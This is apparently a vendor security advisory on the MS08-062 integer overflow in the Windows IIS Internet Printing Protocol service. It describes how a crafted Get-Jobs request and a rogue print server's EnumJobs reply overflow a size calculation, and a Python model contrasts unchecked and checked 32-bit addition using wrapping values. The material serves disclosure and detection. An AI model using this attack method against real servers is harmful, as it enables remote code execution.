The Internet Printing Protocol (IPP) is a standard network protocol for managing remote printing. IPP is built on HTTP/1.1 and supports access control, encryption and authentication. The Microsoft IPP implementation consists of an ISAPI extension for Internet Information Services (IIS). Client hosts send IPP requests to the MS IPP service by accessing the "/printers" HTTP directory through IIS. The server replies to these requests with an HTML page listing all printers currently configured on the server. The IPP service can also be used to query a specific printer on a remote host. The following HTTP request is shown as an example:

POST /printers/~5c~5c10~2e0~2e0~2e10~5cdummy/.printer HTTP/1.1
Content-Type: application/ipp

In the above example, the IPP service is instructed to send an IPP query to the remote SMB printer \\10.0.0.10\dummy. Upon receiving such a request, the IPP service translates it into a SPOOLSS RPC request and redirects it to the given printer. Windows defines a Remote Procedure Call (RPC) interface for the server-side spooler Win32 API. This RPC interface can be accessed via the named pipe "spoolss" with UUID "12345678-1234-abcd-ef00-0123456789ab".

To service the IPP request, the server establishes an SMB connection to the requested printer and sends the IPP request translated into an RPC function call. The RPC reply is then translated into an HTTP/IPP reply and sent back to the original requester in the same HTTP session.

One of the IPP requests is the Get-Jobs request, with operation-id 0x000a. This request translates into the EnumJobs RPC function, whose purpose is to enumerate the print jobs currently managed by the chosen printer. The function's prototype is shown below:

BOOL EnumJobs(
  HANDLE hPrinter, // handle to printer object
  DWORD FirstJob, // index of first job
  DWORD NoJobs, // number of jobs to enumerate
  DWORD Level, // information level
  LPBYTE pJob, // job information buffer
  DWORD cbBuf, // size of job information buffer
  LPDWORD pcbNeeded, // bytes received or required
  LPDWORD pcReturned // number of jobs received
);

Normally, the function is called twice. First, the caller specifies an empty buffer (cbBuf=0) and the spooler replies with pcbNeeded set to the size of the buffer required to store the response. The caller then repeats the request with cbBuf set to the required size.

A buffer overrun vulnerability exists within the IPP implementation on Windows servers running IIS. The flaw may be exploited by remote authenticated attackers by sending a crafted Get-Jobs IPP request to the target server. Specifically, the attacker sends the Get-Jobs IPP request with the IP address and printer name of an attacker-controlled print server. The attacker's print server replies to the SMB/RPC requests from the target, waiting for the EnumJobs RPC function call. The reply to the EnumJobs call provides cbBuf and pcbNeeded values such that, when the vulnerable IPP server adds them, the sum overflows a 32-bit integer. The IPP server allocates memory based on this sum, which is smaller than the size of the pJob data, and this buffer is overwritten by the received pJob.
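The failure mode is an unchecked 32-bit addition of two attacker-supplied size fields: the wrapped sum sizes the allocation, and the subsequent copy of pJob runs past it. The Python below is an added model of that step, not Microsoft's spooler code, written to show the unchecked computation beside the checked one a hardened server would use; the function names and the constructed reply values (0xFFFFFF00 and 0x200, which wrap to 0x100) are assumptions of the example.

```python
U32_MAX = 0xFFFFFFFF


def add_u32_wrapping(a, b):
    """32-bit addition as the unchecked code computes it: the carry is discarded."""
    return (a + b) & U32_MAX


def add_u32_checked(a, b):
    """Return a + b, or None when the result does not fit in 32 bits."""
    total = a + b
    return total if total <= U32_MAX else None


def handle_enumjobs_reply(cbBuf, pcbNeeded, pJob, checked=True):
    """Model of server-side handling of an EnumJobs reply: size a buffer from
    cbBuf + pcbNeeded, then copy pJob into it. Returns how many bytes of pJob
    would land past the end of the allocation (0 when the copy is safe).
    With checked=True an inconsistent reply is rejected instead of copied."""
    if checked:
        alloc = add_u32_checked(cbBuf, pcbNeeded)
        if alloc is None or len(pJob) > alloc:
            raise ValueError("EnumJobs reply rejected: size fields inconsistent with payload")
    else:
        alloc = add_u32_wrapping(cbBuf, pcbNeeded)
    return max(0, len(pJob) - alloc)


def reply_is_rejected(cbBuf, pcbNeeded, pJob):
    """Convenience wrapper: does the checked handler refuse this reply?"""
    try:
        handle_enumjobs_reply(cbBuf, pcbNeeded, pJob, checked=True)
    except ValueError:
        return True
    return False


# Constructed replies: one whose size fields wrap to 0x100 while the job data
# is 0x200 bytes long, and a well-formed second-call reply for comparison.
WRAPPING_REPLY = (0xFFFFFF00, 0x200, b"J" * 0x200)
NORMAL_REPLY = (0, 0x200, b"J" * 0x200)

if __name__ == "__main__":
    print(hex(add_u32_wrapping(0xFFFFFF00, 0x200)))              # 0x100
    print(handle_enumjobs_reply(*WRAPPING_REPLY, checked=False))  # 256 bytes past the buffer
    print(reply_is_rejected(*WRAPPING_REPLY))                     # True
```

The two checks in the hardened path are independent: the overflow test catches the wrap, and the length comparison catches a reply whose pJob is simply larger than the sizes it declares.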

Successful exploitation of this vulnerability may allow arbitrary code injection and execution with the privileges of the IIS server process. Code injection that does not result in execution could terminate the affected process due to memory corruption.

SonicWALL has released an IPS signature that will detect and prevent known exploits of this flaw. The following signature addresses this vulnerability:

  • 5274 – MS Windows Internet Printing Service Integer Overflow PoC (MS08-062)

This vulnerability has been assigned CVE-2008-1446 and is described in the Microsoft security bulletin MS08-062.